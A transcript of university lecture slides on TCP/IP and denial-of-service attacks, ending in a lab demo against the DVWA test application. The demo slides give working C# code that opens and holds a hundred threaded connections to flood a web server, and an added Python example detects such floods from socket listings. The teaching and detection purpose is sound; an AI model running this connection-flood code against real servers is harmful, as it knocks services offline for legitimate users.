NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

Presentation transcript:

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba Czech Republic Denial of service (DOS)

navy.cs.vsb.cz 2 TCP/IP model vs. OSI-RM

navy.cs.vsb.cz 3 TCP/IP model

navy.cs.vsb.cz 4 IP protocol
Defined in RFC: 791
Operates on OSI Layer 3
Allows independent packets to be sent between stations of the internetwork
Unreliable connectionless service

navy.cs.vsb.cz 5 IP Header

navy.cs.vsb.cz 6 TCP/IP transport layer (TCP)
Defined in RFC: 793
The transport-layer entity (i.e. process or service running on a particular machine) is identified by the machine's IP address and port number (which is local to the particular machine)
Port number is a 16-bit number ( )
– : well-known services (80 - HTTP)
– : other registered applications (1433 – MSSQL Server)
– >4096 – client (ephemeral) ports (usually assigned by the OS to the applications)

navy.cs.vsb.cz 7 TCP/IP transport layer (TCP&UDP)
The transport-layer entity (i.e. process or service running on a particular machine) is identified by the machine's IP address and port number (which is local to the particular machine)
Port number is a 16-bit number ( )
– : well-known services (80 - HTTP)
– : other registered applications (1433 – MSSQL Server)
– >4096 – client (ephemeral) ports (usually assigned by the OS to the applications)

navy.cs.vsb.cz 8 TCP protocol
Defined in RFC: 793
Provides a reliable duplex communication
Over unreliable IP
– IP may drop and duplicate packets and deliver them out of order
– TCP protocol ensures reliability of data transfers for upper (application) layer protocols

navy.cs.vsb.cz 9 TCP Header

navy.cs.vsb.cz 10 TCP connection establishment
Three-way handshake: SYN, SYN+ACK, ACK
– Initial sequence number negotiation (independently for both directions)
– ISNs are "random" so that delayed packets from a previous connection between the same stations do not confuse the receiving station
Opening of a connection by both sides simultaneously results in a single connection

navy.cs.vsb.cz 11 TCP connection establishment

navy.cs.vsb.cz 12 TCP connection data flow

navy.cs.vsb.cz 13 TCP connection termination
Any side may close the connection first
Both sides have to close the connection independently
– FIN+ACK (from both sides)

navy.cs.vsb.cz 14 TCP connection in Wireshark

navy.cs.vsb.cz 15 Denial of service attack (DOS)
A denial of service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. For example:
– attempts to flood a network, thereby preventing legitimate network traffic
– attempts to disrupt connections between two machines, thereby preventing access to a service
– attempts to prevent a particular individual from accessing a service
– attempts to disrupt service to a specific system or person

navy.cs.vsb.cz 16 DOS – TCP SYN Flooding
The goal is to prevent hosts or networks from communicating on the network.
The client system begins by sending a SYN message to the server.
The server then acknowledges the SYN message by sending a SYN-ACK message to the client.
The client then finishes establishing the connection by responding with an ACK message.
– The connection between the client and the server is then open, and the service-specific data can be exchanged between the client and the server.

navy.cs.vsb.cz 17 DOS – TCP SYN Flooding
The potential for abuse arises at the point where the server system has sent an acknowledgment (SYN-ACK) back to the client but has not yet received the ACK message.
– The server has built in its system memory a data structure describing all pending connections. This data structure is of finite size, and it can be made to overflow by intentionally creating too many partially-open connections.

navy.cs.vsb.cz 18 Demo - Tools
Hosted web application (DVWA)
Basic knowledge of some programming language (C#, Java, C++)

navy.cs.vsb.cz 19 Demo
In a .NET (C#) application we need to open a TCP connection from the client (attacker's) application to the server.
– Use the System.Net.Sockets.TcpClient class

    TcpClient tcpClient = new TcpClient();

We need to open the connection to the specific IP address and specific port (the HTTP protocol uses TCP 80, the HTTPS protocol uses TCP 443)
– Use the System.Net.IPEndPoint class

    IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80);

navy.cs.vsb.cz 20 Demo
And finally we open the connection

    tcpClient.Connect(endPoint);

To overload our testing web application, we need to open many connections. However, all network operations block the program, so we need to open each connection in its own thread.
– Use the System.Threading.Thread class

    Thread thread = new Thread(FunctionDelegateToExecute);
    thread.Start();

navy.cs.vsb.cz 21 Demo
The final method could look like

    // Requires: using System; using System.Net; using System.Net.Sockets; using System.Threading;
    private static void SendRequest(string ipAddress, string threadName)
    {
        TcpClient tcpClient = new TcpClient();
        IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80);
        try
        {
            // Connect() completes the three-way handshake before returning
            tcpClient.Connect(endPoint);
            Console.WriteLine("Thread #{0}: {1}", threadName, DateTime.Now);
        }
        catch (Exception) { }
        // Keep the connection open until the main thread clears the flag
        while (run)
        {
            Console.WriteLine("Thread #{0}: {1} sleeps", threadName, DateTime.Now);
            Thread.Sleep(1000);
        }
        tcpClient.Close();
    }

navy.cs.vsb.cz 22 Demo
The final application could look like

    // Requires: using System; using System.Collections.Generic; using System.Threading;
    private static bool run = true;

    static void Main(string[] args)
    {
        string ipAddress = " XXX.XXX";
        int threads = 100;
        List<Thread> threadPool = new List<Thread>();
        for (int i = 0; i < threads; i++)
        {
            // Copy the loop variable so each thread reports its own number
            int id = i;
            ThreadStart threadStart = () => SendRequest(ipAddress, id.ToString());
            var thread = new Thread(threadStart) { IsBackground = true };
            threadPool.Add(thread);
            thread.Start();
        }
        Console.ReadLine();
        run = false;
        foreach (var thread in threadPool)
        {
            // Thread.Abort is supported on .NET Framework only
            thread.Abort();
        }
    }

navy.cs.vsb.cz 23 Demo – Legitimate traffic

navy.cs.vsb.cz 24 Demo – Legitimate traffic

navy.cs.vsb.cz 25 Demo
Start Wireshark on the server with the DVWA application
Start your malicious application doing the DoS attack and

navy.cs.vsb.cz 26 Demo Try to access the DVWA web application from browser

navy.cs.vsb.cz 27 Demo See the Wireshark log
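
Added example (not part of the original slides): a server-side check for the two conditions this deck covers, half-open connections filling the pending-connection structure (slide 17) and the demo client holding many completed connections, which appear as ESTAB rather than SYN-RECV because TcpClient.Connect finishes the handshake. The `ss -tan` sample, the addresses and the thresholds are constructed for illustration.

```python
from collections import Counter

# Constructed sample of `ss -tan` output taken on the server (not from the slides).
SAMPLE_SS = """\
State     Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN    0      128    0.0.0.0:80          0.0.0.0:*
SYN-RECV  0      0      192.0.2.10:80       198.51.100.7:40112
SYN-RECV  0      0      192.0.2.10:80       198.51.100.91:51820
SYN-RECV  0      0      192.0.2.10:80       198.51.100.143:1029
ESTAB     0      0      192.0.2.10:80       203.0.113.5:50001
ESTAB     0      0      192.0.2.10:80       203.0.113.5:50002
ESTAB     0      0      192.0.2.10:80       203.0.113.5:50003
ESTAB     0      0      192.0.2.10:80       203.0.113.5:50004
ESTAB     0      0      192.0.2.10:80       198.51.100.20:44321
ESTAB     0      0      192.0.2.10:22       203.0.113.5:50900
"""

def parse_ss(text):
    """Yield (state, local_port, peer_ip) for every socket row."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] == "State":
            continue  # skip blank lines and the column header
        local_port = fields[3].rsplit(":", 1)[1]
        peer_ip = fields[4].rsplit(":", 1)[0]
        yield fields[0], local_port, peer_ip

def assess(text, port="80", half_open_limit=3, per_peer_limit=3):
    """Flag backlog pressure and per-peer connection hoarding (limits are sample values)."""
    half_open, established = 0, Counter()
    for state, local_port, peer_ip in parse_ss(text):
        if local_port != port:
            continue
        if state == "SYN-RECV":    # SYN-ACK sent, final ACK not yet received
            half_open += 1
        elif state == "ESTAB":     # handshake completed, socket held open
            established[peer_ip] += 1
    findings = []
    if half_open >= half_open_limit:
        findings.append(("syn_backlog_pressure", "*", half_open))
    for peer, count in sorted(established.items()):
        if count >= per_peer_limit:
            findings.append(("connection_hoarding", peer, count))
    return findings

if __name__ == "__main__":
    for finding in assess(SAMPLE_SS):
        print(finding)
```

Half-open entries are counted in total rather than per peer because their source addresses may not be genuine, while completed connections can be attributed to the peer that holds them.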

navy.cs.vsb.cz 28 References DVWA - CERT CSRF - HACKING EXPOSED (ISBN: ) Penetration testing (ISBN-10: ) Principles of Computer Security (ISBN: )

navy.cs.vsb.cz 29 Warning Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.